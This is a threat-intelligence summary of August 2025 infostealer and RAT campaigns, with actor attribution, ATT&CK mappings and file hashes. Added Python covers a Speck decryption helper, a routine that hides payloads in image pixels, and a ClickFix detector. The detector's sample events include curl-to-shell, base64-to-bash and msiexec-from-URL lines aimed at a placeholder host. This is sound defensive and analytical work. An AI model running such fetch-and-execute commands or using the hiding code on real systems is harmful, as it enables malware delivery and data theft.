  • Key Trick: Pretends to be an official Russian security tool with government logos to gain trust, while secretly stealing data and sending it through Telegram.

PXA Stealer

  • Vector: Phishing archives disguised as invoices or documents.
  • Method: Sideloaded DLL + decoy documents + bundled WinRAR/Python loader.
  • Payload: Harvests credentials, cookies, PII, crypto wallets, VPNs, and messaging data.
  • Key Trick: Uses trusted signed software + harmless-looking docs to appear safe, while hiding exfiltration in Telegram traffic for resilience.

Android Malware Campaign

  • Vector: Fake banking websites disguised as official Indian financial services.
  • Method: Malicious APK acting as a dropper. It loads encrypted components in stages (two loaders + final payload), making static analysis difficult.
  • Payload:
    • Fake banking interface to steal personal/financial details.
    • Hidden Monero mining using XMRig with arguments pointing to attacker-controlled mining pools.
  • Key Trick: Uses real assets from banking sites and Google Play update screens to appear authentic, while hiding the mining feature until it gets an FCM command.

Salat Stealer

  • Vector: Spread mainly through the Amadey loader, which itself arrives via phishing emails, cracked software downloads, or malicious sites.
  • Method: Once Amadey infects a system, it silently drops and runs SalatStealer. The stealer then connects to its command-and-control panel to start collecting victim data.
  • Payload:
    • Browser credentials, cookies, and autofill data
    • Cryptocurrency wallet information
    • Discord and Telegram tokens
    • Host details such as IP address, system name, and location
  • Key Trick:
    • Leverages Amadey’s distribution channels for rapid spread.
    • Maintains an open GitHub repository (“importantfiles”) for resources and updates, making the project easy for operators to access.
    • Uses a Cloudflare-protected admin panel to organize and manage stolen logs securely.

PyLangGhost RAT

  • Vector: Spread through fake job interviews where victims are asked to run “fix” commands for camera/mic errors.
  • Method: Command downloads a ZIP, expands into a fake Python runtime (csshost.exe), and launches the main loader (nvidia.py).
  • Payload: Steals browser credentials, crypto wallets, and system info, while also enabling file transfer and remote shell access.
  • Key Trick: Relies on social engineering during interviews to get victims to install the malware themselves, with traffic hidden over raw IPs and weak RC4 encryption.

XTinyLoader

  • Vector : Distributed via fake cracked software.
  • Method : Copies itself to ProgramData, creates a registry Run key for persistence, and ensures single execution with a mutex. Downloads extra payloads including Python scripts and DLLs for browser injection.
  • Payload : Clipboard hijacker targeting Bitcoin, Ethereum, Tron, and Litecoin; system info theft; additional payload delivery.
  • Key Trick : Heavy use of XOR encryption for strings and network traffic, plus modular design for crypto theft and browser-based data harvesting.

DarkCloud Stealer

  • Vector : Distributed through phishing emails with compressed attachments (TAR, RAR, 7Z) containing obfuscated JS or WSF files.
  • Method : Scripts download PowerShell payloads from open directory servers. These drop a ConfuserEx-protected .NET loader, which uses process hollowing to inject the final VB6 DarkCloud payload.
  • Payload : Collects credentials, credit card data, and system information, with strings encrypted via RC4 and embedded C2 details.
  • Key Trick : Heavy ConfuserEx obfuscation combined with a VB6 final payload and layered scripts makes analysis difficult and allows the stealer to bypass detection.

NjRat Trojan

  • Vector : Unofficial Minecraft installer (“Eaglercraft 1.12 Offline”) shared on shady download sites/forums.
  • Method : Binder-packed EXE with an invalid Microsoft signature opens a local game HTML as a decoy while dropping CLIENT.exe/WindowsServices.exe, setting Run-key persistence, a mutex, and a firewall allow rule; C2 via Ngrok and AWS.
  • Payload : NjRat with keylogging, screen capture, webcam probe, file/registry ops, remote shell, credential theft, and log exfiltration to C2.
  • Key Trick : Nostalgia/game lure + live decoy gameplay to lower suspicion, combined with an anti-tool/BSOD killswitch and tunneling C2 (Ngrok) to blend in and evade blocks.

Rhadamanthys Stealer

  • Vector : ClickFix phishing pages prompting users to “fix” an error by running a malicious MSI.
  • Method : Uses msiexec to execute the installer in memory, drops files into disguised directories, and launches a stealer payload via a hijacked system file. Later stages hide extra code inside PNG images (steganography).
  • Payload : Rhadamanthys Stealer capable of stealing credentials, browser data, crypto wallets, and sensitive system files.
  • Key Trick : Blends ClickFix social engineering with technical obfuscation (anti-VM, TLS over raw IPs, PNG-stego payloads), making detection and response difficult.

Lazarus Stealer

  • Vector : Sideloaded APK posing as “GiftFlipSoft”, which then hides its icon from the user interface.
  • Method : Takes over the default SMS app role and requests overlay and usage-access permissions; runs background services (app monitor + SMS forwarder); a dynamic WebView pulls phishing pages from C2; continuous device/SMS sync with C2.
  • Payload : Credential theft from Russian banking apps via overlays (card/PIN/password), OTP interception via SMS read/forward, device profiling, remote SMS sending, and ongoing data exfiltration.
  • Key Trick : Overlay phishing plus SMS-role abuse steals credentials while invisibly capturing OTPs, with a C2-controlled WebView to update lures on the fly.

HijackLoader

  • Vector : HijackLoader spreads through pirated game repack sites, leading users through shady redirects to MEGA links that hide malware inside nested ZIP and 7z bundles.
  • Method : A huge fake DLL (DivXDownloadManager.dll) hides the malware. It reads hidden config files, hijacks legit Windows DLLs, and rebuilds encrypted blobs using XOR + compression. It then unhooks security checks, runs anti-VM tricks, and injects into quiet Windows tools (like choice.exe) to stay hidden.
  • Payload : Can drop many families: stealers (Lumma, RedLine, Vidar), RATs (Remcos, xWorm), miners (XMRig), or other loaders.
  • Key Trick : Uses oversized files, DLL hijacking, stack spoofing, and stealthy process injection to evade antivirus and sandboxes.

Noodlophile Stealer

  • Vector: Spear-phishing emails posing as Facebook copyright infringement notices.
  • Method: Emails are sent from Gmail accounts and cite the target's real Facebook Page ID and ownership details to look authentic; payloads are delivered via DLL side-loading in legitimate apps (e.g., PDF readers, converters).
  • Payload: Enhanced Noodlophile Stealer that steals browser data, Facebook cookies, and credit card details.
  • Key Trick: Dynamic staging through Telegram group descriptions and obfuscated scripts disguised as documents, making detection harder.

Odyssey Stealer

  • Vector: Fake CAPTCHA verification pages using ClickFix phishing technique.
  • Method: Base64-encoded commands pasted into the macOS terminal fetch and execute obfuscated AppleScript.
  • Payload: AppleScript stealer that targets browser data, crypto wallets, and system files; exfiltrates to /log endpoint.
  • Key Trick: No binary drop; execution happens entirely via terminal commands and AppleScript, reducing the detection footprint.

QuirkyLoader

  • Vector: Spam emails carrying malicious archive attachments.
  • Method: DLL side-loading via legitimate executables; loader modules written in .NET with AOT compilation to evade analysis.
  • Payload: Infostealers (Agent Tesla, Snake Keylogger, FormBook) and RATs (Remcos, AsyncRAT).
  • Key Trick: Uses rare Speck-128 CTR cipher for payload decryption and process hollowing on trusted Windows processes to remain hidden.
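
Speck128/128 in CTR mode as an analyst's decryption helper for payloads protected the way QuirkyLoader's are, added as an example and not IBM X-Force's or the loader's code. The block cipher follows the Speck designers' reference algorithm and is checked against their published test vector; the CTR layout (a 16-byte nonce used as a little-endian counter block, incremented once per block) and the key, nonce and payload values are assumptions made for the demonstration, so confirm the counter construction against the sample before reusing it.

```python
"""Speck128/128 in CTR mode, written as a payload-decryption helper. Added example:
the block cipher follows the Speck designers' reference (64-bit words, 32 rounds,
little-endian words); the CTR layout and the sample key/nonce/payload are assumptions."""
MASK64 = (1 << 64) - 1
ROUNDS = 32


def _ror(x: int, r: int) -> int:
    return ((x >> r) | (x << (64 - r))) & MASK64


def _rol(x: int, r: int) -> int:
    return ((x << r) | (x >> (64 - r))) & MASK64


def _round(x: int, y: int, k: int) -> tuple:
    """One Speck round: x = ((x >>> 8) + y) ^ k ; y = (y <<< 3) ^ x."""
    x = ((_ror(x, 8) + y) & MASK64) ^ k
    y = _rol(y, 3) ^ x
    return x, y


def key_schedule(key: bytes) -> list:
    """Expand a 16-byte key into 32 round keys (K[0] = first 8 bytes LE, K[1] = next 8)."""
    if len(key) != 16:
        raise ValueError("Speck128/128 needs a 16-byte key")
    k = int.from_bytes(key[:8], "little")
    l = int.from_bytes(key[8:], "little")
    rk = []
    for i in range(ROUNDS - 1):
        rk.append(k)
        l, k = _round(l, k, i)      # the round counter is the round key of the key schedule
    rk.append(k)
    return rk


def encrypt_block(rk: list, block: bytes) -> bytes:
    """Encrypt one 16-byte block; CTR mode only ever needs the forward direction."""
    y = int.from_bytes(block[:8], "little")    # Pt[0]
    x = int.from_bytes(block[8:], "little")    # Pt[1]
    for k in rk:
        x, y = _round(x, y, k)
    return y.to_bytes(8, "little") + x.to_bytes(8, "little")


def speck_ctr(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Keystream block i = E_k(nonce + i); XOR with data. Encrypt and decrypt are the same call."""
    rk = key_schedule(key)
    counter = int.from_bytes(nonce, "little")
    out = bytearray()
    for off in range(0, len(data), 16):
        block = ((counter + off // 16) & ((1 << 128) - 1)).to_bytes(16, "little")
        stream = encrypt_block(rk, block)
        out += bytes(a ^ b for a, b in zip(data[off:off + 16], stream))
    return bytes(out)


def known_answer_ok() -> bool:
    """Designers' published Speck128/128 vector: key 00..0f, plaintext ' made it equival'."""
    rk = key_schedule(bytes(range(16)))
    return encrypt_block(rk, b" made it equival") == bytes.fromhex("180d575cdffe60786532787951985da6")


# Constructed sample: a payload encrypted here with the same routine, then decrypted below.
SAMPLE_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_NONCE = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
SAMPLE_PLAINTEXT = b"MZ" + b"\x90" * 30 + b"constructed stage-2 payload, not a real sample"
SAMPLE_CIPHERTEXT = speck_ctr(SAMPLE_KEY, SAMPLE_NONCE, SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("known-answer test passed:", known_answer_ok())
    print("decrypted header:", speck_ctr(SAMPLE_KEY, SAMPLE_NONCE, SAMPLE_CIPHERTEXT)[:2])
```

When the recovered key is right but the output is still garbage, the usual culprits are the counter layout (big-endian counter, or nonce in the high half and counter in the low half) and word order inside the block; both are one-line changes here, and the known-answer check tells you whether the cipher core itself is sound.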

Remcos RAT

  • Vector: JScript loader executes a PowerShell script.
  • Method: PowerShell downloads a PNG from archive.org, extracts a .NET loader hidden in the pixel RGB values.
  • Payload: Remcos RAT (stealthy remote access trojan).
  • Key Trick: Steganography inside PNG + persistence via registry key + Duck DNS for resilient C2 communication.

God RAT

  • Vector: Malicious .scr (screen saver) and .pif files disguised as financial documents, distributed via Skype messenger.
  • Method: Steganography is used to embed shellcode inside image files. When executed, the shellcode downloads and injects GodRAT into legitimate processes like curl.exe or cmd.exe. DLL side-loading with expired certificates was also observed.
  • Payload: GodRAT (a Gh0st RAT variant), supporting plugins such as FileManager, along with secondary implants like AsyncRAT and password stealers for Chrome and Edge.
  • Key Trick: Uses the “-Puppet” parameter (a throwback to AwesomePuppet RAT), shellcode loaders hidden in images, and signed-but-expired executables for stealth.
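
An illustration, added here rather than taken from the Remcos, Rhadamanthys or GodRAT samples, of how a payload is carried in an image's channel values and how a hunting script recovers it. It operates on a raw RGB pixel buffer so it runs without an image library (with Pillow you would pass img.convert("RGB").tobytes()); the layout, a 4-byte little-endian length followed by the payload, stored either one byte per channel or one bit per channel, is an assumption rather than any of these loaders' documented format, and the cover image and payload are constructed.

```python
"""Embed and recover a payload hidden in RGB channel values. Added example for this report,
not code from any of the loaders discussed; the layout (4-byte LE length + payload, whole-byte
or LSB per channel) is an assumption, and the cover/payload below are constructed."""
import random
import struct


def embed_whole_byte(pixels: bytes, payload: bytes) -> bytes:
    """Overwrite channel values wholesale: trivial to read back, but visibly corrupts the region."""
    blob = struct.pack("<I", len(payload)) + payload
    if len(blob) > len(pixels):
        raise ValueError("cover image too small")
    return blob + pixels[len(blob):]


def extract_whole_byte(pixels: bytes, magic: bytes = b"MZ"):
    """Read length, then payload; reject implausible lengths and payloads without the expected magic."""
    if len(pixels) < 4:
        return None
    (length,) = struct.unpack("<I", pixels[:4])
    if length == 0 or length > len(pixels) - 4:
        return None
    payload = pixels[4:4 + length]
    return payload if payload.startswith(magic) else None


def embed_lsb(pixels: bytes, payload: bytes) -> bytes:
    """One payload bit per channel LSB: invisible to the eye and to file-size checks, which is
    why hunting has to look at the bit plane rather than the rendered picture."""
    blob = struct.pack("<I", len(payload)) + payload
    if len(blob) * 8 > len(pixels):
        raise ValueError("cover image too small")
    out = bytearray(pixels)
    for i, byte in enumerate(blob):
        for bit in range(8):
            idx = i * 8 + bit
            out[idx] = (out[idx] & 0xFE) | ((byte >> bit) & 1)
    return bytes(out)


def extract_lsb(pixels: bytes, magic: bytes = b"MZ"):
    """Reassemble bytes from channel LSBs with the same length/magic sanity checks."""
    def read(n: int, offset: int) -> bytes:
        out = bytearray()
        for i in range(n):
            v = 0
            for bit in range(8):
                v |= (pixels[offset + i * 8 + bit] & 1) << bit
            out.append(v)
        return bytes(out)

    if len(pixels) < 32:
        return None
    (length,) = struct.unpack("<I", read(4, 0))
    if length == 0 or 32 + length * 8 > len(pixels):
        return None
    payload = read(length, 32)
    return payload if payload.startswith(magic) else None


# Constructed cover (64x64 RGB of seeded pseudo-random noise) and a fake loader stub starting with MZ.
_rng = random.Random(7)
COVER = bytes(_rng.getrandbits(8) for _ in range(64 * 64 * 3))
FAKE_LOADER = b"MZ" + bytes(range(256)) * 4 + b"constructed .NET loader stub"

if __name__ == "__main__":
    print("whole-byte recovered:", extract_whole_byte(embed_whole_byte(COVER, FAKE_LOADER)) == FAKE_LOADER)
    print("LSB recovered:", extract_lsb(embed_lsb(COVER, FAKE_LOADER)) == FAKE_LOADER)
```

The magic check is what keeps this usable as a triage rule over a bucket of downloaded images: a random cover almost never yields a plausible length followed by an MZ header, so a hit is worth a look, and swapping the magic for the first bytes of a PE, a shellcode stub, or a zlib header covers the other carriers mentioned in this report.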

SHAMOS Stealer

  • Vector: Fake macOS help websites promoted via Google malvertising and spoofed GitHub repos.
  • Method: Victims searching for macOS fixes were shown fake “support pages” that tricked them into pasting a one-line Terminal command. The command bypassed Gatekeeper and installed SHAMOS directly.
  • Payload: A Mach-O executable that steals browser data, Keychain credentials, Apple Notes, and cryptocurrency wallet details. It also dropped a fake Ledger Live app and a botnet module for extended control.
  • Key Trick: Used Base64-encoded commands and trusted services (malvertising + GitHub) to appear legitimate, while silently exfiltrating stolen data in an out.zip archive via curl.
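
Detection logic, added here as an example and not taken from any vendor's content, for the ClickFix command lines described above: the macOS "echo <base64> | base64 -d | bash" one-liner (Odyssey, SHAMOS), curl piped straight into a shell, quarantine-attribute stripping, and the Windows msiexec-from-URL variant (Rhadamanthys). The events it scans are constructed; in production the same function runs over process-creation telemetry (EDR, the macOS Endpoint Security framework, Sysmon event ID 1 on Windows).

```python
"""Flag ClickFix-style one-liners in process command lines. Added example over
constructed events; not the report's or any vendor's detection content."""
from __future__ import annotations

import base64
import re

B64_ECHO = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)\b")
PIPE_TO_INTERP = re.compile(r"\|\s*(?:sudo\s+)?(?:bash|sh|zsh|osascript)\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
QUARANTINE = re.compile(r"\bxattr\s+(?:-c\b|(?:-r\s+)?-d\s+com\.apple\.quarantine)")
MSI_OR_HTA_FROM_URL = re.compile(r"\b(?:msiexec(?:\.exe)?\s.*?/i\s+|mshta(?:\.exe)?\s+)['\"]?https?://", re.I)


def decode_b64_stage(cmd: str):
    """Return the decoded text of an 'echo <b64> | base64 -d' stage, or None if absent/invalid."""
    m = B64_ECHO.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def analyze(cmd: str) -> list[str]:
    """Reasons this command line looks like ClickFix execution ([] when nothing matches)."""
    reasons = []
    decoded = decode_b64_stage(cmd)
    if decoded is not None and PIPE_TO_INTERP.search(cmd):
        reasons.append(f"base64-decoded stage piped into interpreter: {decoded.strip()!r}")
    # Look at the raw line and at the decoded stage: the lure usually hides the fetch inside the blob.
    for stage in (cmd, decoded or ""):
        if DOWNLOADER.search(stage) and PIPE_TO_INTERP.search(stage):
            reasons.append("remote content fetched with curl/wget and piped into a shell")
            break
    if QUARANTINE.search(cmd) or (decoded and QUARANTINE.search(decoded)):
        reasons.append("quarantine attribute stripped (Gatekeeper bypass); low confidence on its own")
    if MSI_OR_HTA_FROM_URL.search(cmd):
        reasons.append("msiexec/mshta executing a package straight from a URL")
    return reasons


def scan(events: list[dict]) -> list[dict]:
    """Run analyze() over process-creation events; return only the flagged ones."""
    return [{"host": e["host"], "cmdline": e["cmdline"], "reasons": r}
            for e in events if (r := analyze(e["cmdline"]))]


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed process-creation events (not telemetry from the report); lure.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"host": "mac-01", "cmdline": f'bash -c "echo {_b64("curl -fsSL http://lure.invalid/p | osascript")} | base64 -d | bash"'},
    {"host": "mac-02", "cmdline": 'sh -c "curl -fsSL https://lure.invalid/install.sh | bash"'},
    {"host": "mac-03", "cmdline": "xattr -c /Users/demo/Downloads/Update.app"},
    {"host": "win-07", "cmdline": "cmd.exe /c msiexec /i https://lure.invalid/fix.msi /qn"},
    {"host": "mac-04", "cmdline": "brew install wget"},
    {"host": "win-08", "cmdline": r"msiexec.exe /i C:\Users\demo\Downloads\app.msi /qn"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["host"], "->", "; ".join(hit["reasons"]))
```

The decoded stage is returned with the finding on purpose: the base64 blob is the part the victim cannot read, so surfacing it is what lets an analyst see the curl target and the interpreter (osascript, bash, msiexec) without re-running anything. Expect some noise from developer tooling that pipes installers into a shell; the msiexec-from-URL and quarantine-stripping signals are the ones that rarely appear in legitimate administration.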

Anatsa malware

  • Vector: Fake “document reader” apps on Google Play Store.
  • Method: Decoy apps look legitimate but secretly download the Anatsa payload as an update from a C2 server.
  • Payload: Banking trojan with credential theft, keylogging, fake banking pages, and crypto wallet targeting.
  • Key Trick: Uses runtime DES decryption, device checks, and malformed APK archives to evade Google’s detection and security tools.

Threat Actor Attribution

Several campaigns observed in August 2025 were linked to known or suspected threat actor groups. Below is a summary of actors, their likely regions, motives, preferred targets, and associated malware.

Threat Actor / Group | Region | Motives | Targets | Associated Malware
COOKIE SPIDER | Russia / Eastern Europe | Financial gain via malware-as-a-service (MaaS) | macOS users (crypto holders, developers) | SHAMOS (AMOS variant)
Winnti-linked Actors (GodRAT Evolution) | China | Long-term espionage & financial theft | Financial firms (trading, brokerage) | GodRAT (Gh0st RAT lineage), AsyncRAT
Lazarus-linked Android Operators | North Korea | Financial theft, espionage | Russian banking users | Lazarus Stealer (Android overlay/SMS)
PXA Stealer Operators | Unknown (Telegram-driven) | Credential theft, monetization | Global users, Telegram communities | PXA Stealer
Rhadamanthys Affiliates | Global | Info-stealer distribution | Enterprises via ClickFix phishing | Rhadamanthys Stealer
Noodlophile Developers | Likely Eastern Europe | Credential & session cookie theft | Enterprises with Facebook presence | Noodlophile Stealer
XTinyLoader Operators | Unknown | Initial access broker (stealer/RAT delivery) | Global Windows users | XTinyLoader
QuirkyLoader Actors | Unknown (suspected financially motivated) | Loader for stealers & RATs | Taiwan (Nusoft employees), Mexico (individuals) | QuirkyLoader (Agent Tesla, AsyncRAT, Remcos, Snake Keylogger)
Android Banking Campaign Operators | India | Financial theft | Indian banking app users | Android banking malware (Anatsa variant suspected)
DarkCloud Operators | Unknown | Data theft & credential resale | Global Windows users | DarkCloud Stealer
Fake Cheat/Minecraft Mod Actors | Global | Credential theft, crypto theft | Gamers (Minecraft & cheat tool users) | Lumma Stealer, NjRat
Tamperedchef Campaign Operators | Likely Southeast Asia | Malware monetization via ads | Enterprises & end-users (Europe focus) | Tamperedchef (PDF Editor stealer)
Odyssey Stealer Actors | Unknown | macOS data theft (crypto, credentials) | macOS users (via ClickFix CAPTCHA) | Odyssey Stealer
SalatStealer Affiliates | Likely Eastern Europe | Data resale, credential theft | Global via Amadey loader | SalatStealer (aka WEB_RAT)
PyLangGhost Developers (Lazarus-linked) | North Korea | Espionage & financial theft | Finance & tech sectors | PyLangGhost RAT

Infostealer Impact Trends – August 2025

Throughout August 2025, active infostealer campaigns continued to compromise large volumes of accounts across domains, email providers, social media platforms, and geographic regions. Analysis of the top ten most impacted entities highlights how attackers strategically target widely used services to maximize reach and monetization opportunities.

Top 10 Most Compromised Domains by Infostealers

Domains: Popular platforms such as Google, Facebook, Live.com, and Instagram remain the most compromised, reflecting their role as primary identity providers and gateways to other services.

Top 10 Most Compromised Email Providers by Infostealers

Email Providers: Gmail dominates the list, with significantly higher compromise counts compared to other providers, underscoring its centrality in personal and professional communications.

Top 10 Most Compromised Social Media Platforms by Infostealers

Social Media Platforms: Facebook, Instagram, and Twitter top the list, showing that attackers continue to focus on accounts that can be abused for scams, influence operations, and secondary compromises.

Top 10 Most Infected Countries by Infostealers

Countries: India, the United States, and Brazil lead the infection landscape, suggesting that both high user density and diverse digital ecosystems attract threat actor activity.

The daily trend highlights how infostealer campaigns unfolded in sharp waves, with quiet periods followed by sudden spikes. Activity intensified mid to late July, showing a pattern of coordinated, large-scale campaigns rather than steady infections.

YARA Rules

For detection of known stealers observed in the report:

TTP Matrix (MITRE ATT&CK Mapping)

Malware / Campaign | Initial Access | Execution | Persistence | Collection / Exfiltration | C2 Communication
Lumma Stealer (Fake Cheat Sites) | T1566.002 – Spearphishing Link (fake cheat websites / malvertising) | T1204.002 – User Execution: Malicious File | T1547.001 – Registry Run Keys | T1005 – Data from Local System, T1555 – Credentials from Password Stores | T1071.001 – Web Protocols (HTTP/S)
FSB Stealer (Fake CyberShield) | T1195 – Supply Chain Compromise (fake AV installer) | T1204.002 – User Execution: Malicious File | T1547 – Boot or Logon Autostart Execution | T1557 – Adversary-in-the-Middle (credential theft) | T1071.001 – Web Protocols
PXA Stealer (Telegram-driven) | T1566 – Phishing (Telegram channels) | T1059.006 – Command and Scripting Interpreter: Python | T1547.001 – Registry Run Keys | T1005 – Data from Local System | T1071.001 – Web Protocols
Android Banking Malware Campaign (India) | T1475 – Deliver Malicious App via Authorized App Store (Google Play) | T1204.002 – User Execution: Malicious File (user installs the app) | T1402 – Broadcast Receivers (BOOT_COMPLETED auto-start) | T1412 – Capture SMS Messages, T1417 – Input Capture | T1437 – Application Layer Protocol
SalatStealer (via Amadey Loader) | T1566.001 – Spearphishing Attachment | T1059 – Command and Scripting Interpreter | T1547.001 – Registry Run Keys | T1005 – Data from Local System | T1071.001 – Web Protocols
PyLangGhost RAT (Lazarus) | T1566.002 – Spearphishing Link | T1059.006 – Command and Scripting Interpreter: Python | T1547 – Boot or Logon Autostart Execution (registry/services) | T1005 – Data from Local System, T1041 – Exfiltration Over C2 Channel | T1071.001 – Web Protocols (encrypted)
XTinyLoader | T1566 – Phishing (malicious loaders) | T1055 – Process Injection | T1547.001 – Registry Run Keys | T1005 – Data from Local System (system/browser data), T1115 – Clipboard Data (wallet address swapping) | T1105 – Ingress Tool Transfer
DarkCloud Stealer | T1566.001 – Spearphishing Attachment (TAR/RAR/7Z with JS/WSF scripts) | T1204.002 – User Execution: Malicious File, T1059.001 – PowerShell, T1055.012 – Process Hollowing | T1547.001 – Registry Run Keys | T1005 – Data from Local System, T1555 – Credentials from Password Stores | T1071.001 – Web Protocols
Minecraft Mod / Fake Cheat Dropping NjRat | T1189 – Drive-by Compromise (fake installer on download sites/forums) | T1204.002 – User Execution: Malicious File | T1547.001 – Registry Run Keys | T1005 – Data from Local System, T1056.001 – Keylogging, T1113 – Screen Capture | T1095 – Non-Application Layer Protocol (TCP over Ngrok tunnel)
Rhadamanthys (ClickFix Campaign) | T1566.002 – Spearphishing Link (ClickFix pages) | T1204.004 – User Execution: Malicious Copy and Paste, T1218.007 – System Binary Proxy Execution: Msiexec | T1547.001 – Registry Run Keys | T1555 – Credentials from Password Stores, T1005 – Data from Local System | T1071.001 – Web Protocols (TLS to raw IPs), T1027.003 – Steganography (PNG stages)
Lazarus Android Stealer (Overlay + SMS) | T1476 – Deliver Malicious App via Other Means (sideloaded APK) | T1204.002 – User Execution: Malicious File (user installs the app) | T1402 – Broadcast Receivers (boot auto-start) | T1412 – Capture SMS Messages, T1417.002 – GUI Input Capture (overlays) | T1437 – Application Layer Protocol
HijackLoader (via Pirated Cracks) | T1189 – Drive-by Compromise (pirated game repacks) | T1574 – Hijack Execution Flow (DLL hijacking), T1055 – Process Injection | T1547.001 – Registry Run Keys | T1005 – Data from Local System | T1071.001 – Web Protocols
Noodlophile Stealer (Copyright Phishing) | T1566.002 – Spearphishing Link (copyright lure) | T1204.002 – User Execution: Malicious File, T1574 – Hijack Execution Flow (DLL side-loading) | T1547.001 – Registry Run Keys | T1539 – Steal Web Session Cookie, T1555.003 – Credentials from Web Browsers | T1071.001 – Web Protocols, T1105 – Ingress Tool Transfer (Telegram-staged)
Odyssey Stealer (ClickFix macOS) | T1566.002 – Spearphishing Link (fake CAPTCHA pages) | T1204.004 – User Execution: Malicious Copy and Paste, T1059.004 – Unix Shell, T1059.002 – AppleScript | T1543.001 – Launch Agent | T1005 – Data from Local System, T1555.001 – Keychain | T1071.001 – Web Protocols (HTTPS)
QuirkyLoader | T1566.001 – Spearphishing Attachment (malspam archives) | T1574 – Hijack Execution Flow (DLL side-loading), T1055.012 – Process Hollowing | T1547.001 – Registry Run Keys | T1005 – Data from Local System | T1071.001 – Web Protocols (HTTPS)
Remcos RAT (Internet Archive Abuse) | T1566 – Phishing (JScript loader) | T1059.007 – JavaScript, T1059.001 – PowerShell | T1547.001 – Registry Run Keys | T1005 – Data from Local System | T1071.001 – Web Protocols, T1105 – Ingress Tool Transfer (PNG from archive.org; T1027.003 – Steganography), T1568 – Dynamic Resolution (Duck DNS)
GodRAT (Gh0st RAT Evolution) | T1566.001 – Spearphishing Attachment (SCR/PIF files via Skype) | T1055 – Process Injection (curl.exe, cmd.exe), T1574 – Hijack Execution Flow (DLL side-loading), T1027.003 – Steganography (shellcode in images) | T1547 – Boot or Logon Autostart Execution (registry) | T1005 – Data from Local System, T1555.003 – Credentials from Web Browsers | T1095 – Non-Application Layer Protocol (encrypted TCP)
SHAMOS (COOKIE SPIDER macOS) | T1189 – Drive-by Compromise (malvertising / fake macOS help sites) | T1204.004 – User Execution: Malicious Copy and Paste, T1059.004 – Unix Shell, T1553.001 – Gatekeeper Bypass | T1543.001 – Launch Agent | T1005 – Data from Local System (files, wallets), T1555.001 – Keychain | T1071.001 – Web Protocols (HTTPS)
Anatsa (Fake Apps on Google Play) | T1475 – Deliver Malicious App via Authorized App Store | T1204.002 – User Execution: Malicious File (user installs the app) | T1402 – Broadcast Receivers (boot auto-start) | T1417.001 – Keylogging, T1417.002 – GUI Input Capture (fake banking pages) | T1437 – Application Layer Protocol
Tamperedchef (PDF Editor) | T1189 – Drive-by Compromise (Google Ads malvertising) | T1204.002 – User Execution: Malicious File | T1547.001 – Registry Run Keys | T1005 – Data from Local System | T1071.001 – Web Protocols

Note: the Android rows use Mobile ATT&CK IDs. T1475/T1476 (app delivery), T1402 (Broadcast Receivers) and T1412 (Capture SMS Messages) are deprecated in current Mobile ATT&CK releases in favour of newer techniques, so check which matrix version your detection platform expects before importing these mappings.

References

https://hackedlist.io/statistics

https://www.infostealers.com/info-stealers-reports/

https://x.com/suyog41/status/1950863888943100111

https://www.sentinelone.com/labs/ghost-in-the-zip-new-pxa-stealer-and-its-telegram-powered-ecosystem/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-targets-indian-banking-users-to-steal-financial-info-and-mine-crypto/

https://x.com/abuse_ch/status/1952720761472373029

https://any.run/cybersecurity-blog/pylangghost-malware-analysis/

https://x.com/abuse_ch/status/1953451934863520119

https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/

https://www.pointwild.com/threat-intelligence/fake-minecraft-game-spreads-njrat-malware-what-you-need-to-know

https://x.com/anyrun_app/status/1955260801968672841

https://www.cyfirma.com/research/lazarus-stealer-android-malware-for-russian-bank-credential-theft-through-overlay-and-sms-manipulation/

https://www.trellix.com/blogs/research/analysis-of-hijackloader-and-its-infection-chain/

https://www.morphisec.com/blog/noodlophile-stealer-evolves-targeted-copyright-phishing-hits-enterprises-with-social-media-footprints/

https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users

https://www.ibm.com/think/x-force/ibm-x-force-threat-analysis-quirkyloader

https://x.com/vmray/status/1958135753634115657

https://securelist.com/godrat/117119/

https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/

https://www.zscaler.com/blogs/security-research/android-document-readers-and-deception-tracking-latest-updates-anatsa

https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor

Indicators & Samples

SHA256 Stealer/Malware
0014e6039ee21d109d1c7cf79351ae8287f499fd4d0df824a8ed68cfdb74eeb5 Lumma Stealer
022ae7b2b0900b190f32014ce1bb3c22654e092bc7d0f390e92b24ea35ad4574 Lumma Stealer
02ffc4ad3754375c76a503a8b38819a5927f894473c95874b7aed5606f844c3e Lumma Stealer
05cdc67ae52e62e5ecd61f50e8209b6815b8bb229f289e5be35854fc8b81466d Lumma Stealer
07264acc70af678ef6ba94a1545f3be9edd50b35f47fee93a4887ee5759b4937 Lumma Stealer
19e024dd726c7a07838b751127cd8d98797f46ed0605bda57421069fd5ca0d53 Lumma Stealer
4e36d68bad9b0d15464ef5447ad6989ea3a173de265118d045444b0082a4dad8 FSB Stealer
c1130d2873ac3ea546dd8886d90ce49d9e262b44228416155db1cf83c6fab0eb PXA Stealer
e0a1d5e205ee874e0aeb03f48841d1be75d0e08d10c2d185d9566cfc37007db9 PXA Stealer
8d8b2b52487db0ab9b2c1c81e8fa7f5042bc0207d7769e7dfb2e5e6ab92e8f26 PXA Stealer
b5d85d668ad52173bf6022149b35f4fe35cf928deccfceef1f6b44e38ee52e56 PXA Stealer
79130ecdf4d02dea191723aa3f1499dba3e24d8b2b93e40762cf905f61836b20 PXA Stealer
0bab23a96741d16f5a4f1a55f6f17adca8f8a9810f79f356311a9a4bb99c1040 PXA Stealer
be3aa7bd793102e14564b0b0fd9539bdf5b84c45fab5f580c8112eb8afca99e1 PXA Stealer
